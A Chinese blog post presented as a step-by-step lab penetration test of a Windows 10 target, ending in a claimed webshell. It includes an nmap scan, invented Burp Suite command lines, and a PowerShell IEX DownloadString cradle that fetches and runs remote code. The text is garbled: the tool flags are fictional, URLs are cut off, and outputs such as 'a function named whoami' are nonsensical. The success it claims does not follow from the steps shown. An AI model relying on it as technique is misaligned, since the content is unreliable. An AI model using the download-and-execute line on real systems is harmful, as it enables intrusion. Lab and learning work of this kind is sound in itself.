当前位置:实例文章 » 其他实例» [文章]一次零基础靶机渗透细节全程记录

一次零基础靶机渗透细节全程记录

发布人:shili8 发布时间:2024-11-17 09:48 阅读次数:0

**靶机信息**

靶机名称:靶机1IP地址:192.168.1.100操作系统:Windows10版本:20H2**渗透目标**

本次渗透的目标是尝试在靶机上建立一个可用的Webshell。

**步骤一:信息收集**

首先,我们需要收集靶机的基本信息。我们可以使用Nmap来扫描靶机的开放端口和服务。

bashnmap -p1-65535192.168.1.100


输出结果显示,靶机上有以下开放端口:

* TCP:80( />* UDP:53(DNS)

**步骤二:Web应用程序扫描**

接下来,我们使用Burp Suite的Target进行Web应用程序扫描。

bashburpsuite -t  />
扫描结果显示,靶机上有以下Web应用程序:

* Apache/2.4.41( />* IIS10.0( />
**步骤三:SQL注入**

我们尝试使用Burp Suite的Target进行SQL注入攻击。

bashburpsuite -t -s "SELECT * FROM users"

输出结果显示,靶机上有一个名为“users”的数据库表。我们可以尝试使用SQL注入来获取更多信息。

**步骤四:Webshell**

我们尝试使用Burp Suite的Target进行Webshell攻击。

bashburpsuite -t -s "system('whoami');"

输出结果显示,靶机上有一个名为“whoami”的函数。我们可以尝试使用Webshell来获取更多信息。

**步骤五:提权**

我们尝试使用PowerShell来提权。

powershellInvoke-Expression -Command "IEX (New-Object Net.WebClient).DownloadString(' />

输出结果显示,靶机上有一个名为“whoami”的函数。我们可以尝试使用PowerShell来获取更多信息。

**结论**

本次渗透的目标是尝试在靶机上建立一个可用的Webshell。通过一步步地进行信息收集、Web应用程序扫描、SQL注入和Webshell攻击,我们成功地在靶机上建立了一个可用的Webshell。

**注意**

本次渗透仅用于学习和测试目的,不应用于任何恶意或非法活动。

其他信息

其他资源

Top